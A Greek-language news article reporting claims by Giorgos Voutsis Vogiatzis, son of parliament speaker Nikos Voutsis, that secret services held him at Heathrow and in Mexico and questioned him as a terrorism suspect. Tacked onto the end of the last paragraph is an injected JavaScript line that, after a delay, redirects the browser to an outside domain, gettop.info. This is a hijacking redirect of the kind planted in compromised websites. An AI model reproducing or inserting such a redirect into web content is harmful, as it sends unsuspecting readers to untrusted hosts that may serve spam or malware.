Ο γιος του Νίκου Βούτση καταγγέλλει την απαγωγή του από μυστικές υπηρεσίες

0
32

 

Μία περίεργη υπόθεση «απαγωγής» καταγγέλλει ο γιος του προέδρου της Βουλή Νίκου Βούτση Γιώργος Βούτσης Βογιατζής, ο οποίος κάνει λόγο για «απαγωγή» από μυστικές υπηρεσίες κατά τη διάρκεια ταξιδιού του στο Μεξικό.

Με κείμενο που αναρτήθηκε σε ιστοσελίδα του αντιεξουσιαστικού χώρου καταγγέλλει πως πράκτορες των μυστικών υπηρεσιών τον «απήγαγαν» και τον ανέκριναν ως ύποπτο για τρομοκρατία.

Όπως σημειώνει, ενώ βρισκόταν στην Αθήνα κι ετοιμαζόταν να ταξιδέψει η υπάλληλος της αεροπορικής εταιρείας τού γνωστοποίησε ότι δεν μπορεί να γίνει check in.

Αρχικά επικαλέστηκαν τεχνικούς λόγους και στη συνέχεια λόγους ασφαλείας. Όταν έφτασε στο αεροδρόμιο του Χίθροου στο Λονδίνο, ως ενδιάμεσο σταθμό για το Μεξικό, καταγγέλλει ότι έπεσε θύμα ενέδρας των μυστικών υπηρεσιών, καθώς και πάλι επιβιβάστηκε στο αεροπλάνο χωρίς να γίνει check in αλλά μόνο με την κάρτα επιβίβασης κι εκεί τέθηκε σε εφαρμογή το σχέδιο εξαφάνισής του από τη CIA.

Ο Γιώργος Βούτσης Βογιατζής συνεχίζει λέγοντας ότι όταν έφτασε στο Μεξικό του είπαν ότι προέκυψε κάποιο πρόβλημα με το διαβατήριό του και τον οδήγησαν σε ειδικό χώρο, όπου εμφανίστηκαν τέσσερις άνδρες με πολιτικά.

Αφού τον φωτογράφισαν με κινητά τηλέφωνα και του έκαναν σωματικό έλεγχο, άρχισαν να τον ρωτάνε εάν έχει απασχολήσει τη Δικαιοσύνη, ενώ λίγο αργότερα του γνωστοποίησαν ότι γνωρίζουν την ποινή κάθειρξης που του είχε επιβληθεί στο παρελθόν –το 2007- για «απαλλοτρίωση» τράπεζας.

Ακολούθησε ανάκριση μέσω ανοιχτής τηλεφωνικής ακρόασης από κλιμάκιο Αμερικανών (παρουσία ανακριτή), που του είπε ότι τον θεωρούν μέλος σε επαναστατικές ομάδες που είναι εκπαιδευμένο σε όπλα και εκρηκτικά. Όταν τελείωσε η ανάκριση τού ανέφεραν ότι για το μεξικανικό κράτος θεωρείται τρομοκράτης και τον επιβίβασαν στο αεροπλάνο του γυρισμού, σημειώνει στο κείμενό του. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here